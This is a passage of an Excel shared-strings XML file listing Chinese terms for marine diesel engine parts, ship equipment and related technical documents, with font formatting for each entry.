    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统，详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑用安装螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑用液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部钻头保护刮环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶撑件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶撑拉伸数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶撑力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶撑说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶撑外形图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶面板加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订购清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可变喷嘴环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订购清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器插芯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订购清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急鼓风机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订货单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动定时</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定货清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-TCS</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定货清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力涡轮机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定矩螺旋桨遥控系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距块</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距块，燃油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定时导圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定时器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位棒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位销</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位销用孔，飞轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定向仪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定压管应急旁通</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力管理系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力输出传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力输出轴安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力透平概述</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力装置规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>渡轮二冲程主机布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>渡轮四冲程主机布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镀铝活塞环质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镀镍</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镀锌带钢框架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部地脚螺栓液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部地脚螺栓液压拉伸器螺栓</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部顶部支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部横托梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部机架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部楔垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端挡块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端锲块总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端头止挡开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端箱体护盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端楔垫螺栓组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端轴承吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端子杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端子台附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端子箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端子箱延伸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短贯穿螺栓安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短贯穿螺栓的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>断路器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻钢连杆维修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造齿轮质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造气缸盖质量控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造曲轴的质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对比器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对接板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对接法兰，弹性连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对中曲轴模型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对中数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多孔缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多孔金属网</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多路阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多少图纸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多用控制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多用途控制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>舵杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>舵喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>舵扇</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>舵销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>惰轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>惰轮装配总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>惰性气体支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>俄语说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>额外备件部分提供</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
